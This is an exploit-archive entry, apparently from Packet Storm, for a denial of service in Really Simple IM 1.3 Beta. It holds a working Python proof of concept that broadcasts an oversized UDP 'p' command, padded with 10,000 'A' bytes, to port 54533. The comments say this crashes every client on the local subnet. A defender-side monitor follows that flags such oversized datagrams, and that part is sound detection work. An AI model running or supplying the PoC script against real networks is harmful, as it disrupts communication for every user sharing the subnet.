Really Simple IM 1.3 Beta Denial Of Service

2010-07-20T00:00:00
ID PACKETSTORM:91979
Type packetstorm
Reporter loneferret
Modified 2010-07-20T00:00:00

Description

```python
#!/usr/bin/python

import socket
import sys

# Bug found: 18th July 2010
# DoS proof of concept
# Found by: loneferret
# Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3

# Really Simple IM version 1.3 beta
# Software: http://code.google.com/p/reallysimpleim/
# Nods to exploit-db
# I don't want this on injector <- notice the no leet talk.

# This little application uses UDP to send & receive messages.
# It broadcasts everything, and picks up everything
# on port 54533.
# The funny thing with this PoC, it will crash all clients
# in the same subnet. Yup it's that funny. That's the only thing it does too...
# No EIP, no SEH but the buffer is still in memory at the
# moment of the crash. Figured I'd share anyway.


# Commands
# 'p' Connect and adds users to list
# 'a' Disconnect message
# 'b' Send message
# 't' Direct message

host = '192.168.xxx.255' # Adjust broadcast address to your network
port = 54533

buffer

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind((host, 0))
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
except:
    print "socket() failed"
    sys.exit(1)

da = "p"
da += "W00T" + ("\x41" * 10000)
s.sendto(da, (host, port))
```
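A defender-side check for the traffic described in the PoC comments, as an added example that is not part of the original advisory: it classifies datagrams seen on UDP port 54533 by their command byte and flags oversized ones. The 1024-byte threshold, the function names and the sample datagrams are assumptions constructed for illustration; the advisory does not document a maximum message size or the field layout after the command byte.

```python
import socket
from collections import Counter

RSIM_PORT = 54533  # UDP port named in the advisory
# One-byte command prefixes listed in the advisory's comments.
COMMANDS = {ord("p"): "connect", ord("a"): "disconnect",
            ord("b"): "message", ord("t"): "direct-message"}
MAX_PAYLOAD = 1024  # assumed alert threshold, not a documented protocol limit


def classify(datagram, max_payload=MAX_PAYLOAD):
    """Return (verdict, command_name) for one datagram seen on RSIM_PORT."""
    if not datagram:
        return "empty", None
    name = COMMANDS.get(datagram[0])
    if name is None:
        return "unknown-command", None
    if len(datagram) - 1 > max_payload:  # bytes after the command prefix
        return "oversized", name
    return "ok", name


def summarize(events, max_payload=MAX_PAYLOAD):
    """Count non-ok verdicts per (source, verdict) from (src_ip, datagram) pairs."""
    alerts = Counter()
    for src, data in events:
        verdict, _ = classify(data, max_payload)
        if verdict != "ok":
            alerts[(src, verdict)] += 1
    return alerts


def monitor(bind_addr="0.0.0.0"):
    """Passively listen on the IM port and print one line per suspicious datagram."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((bind_addr, RSIM_PORT))
    while True:
        data, (src, _port) = s.recvfrom(65535)
        verdict, name = classify(data)
        if verdict != "ok":
            print(f"ALERT {verdict} from {src}: cmd={name} len={len(data)}")


# Constructed sample traffic (documentation addresses), not captured data.
SAMPLE = [("192.0.2.10", b"palice"), ("192.0.2.10", b"bhello"),
          ("192.0.2.66", b"p" + b"x" * 10004), ("192.0.2.77", b"zjunk")]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Because the clients accept broadcast traffic from any host on the subnet, the source address in an alert identifies only the claimed sender of the UDP datagram.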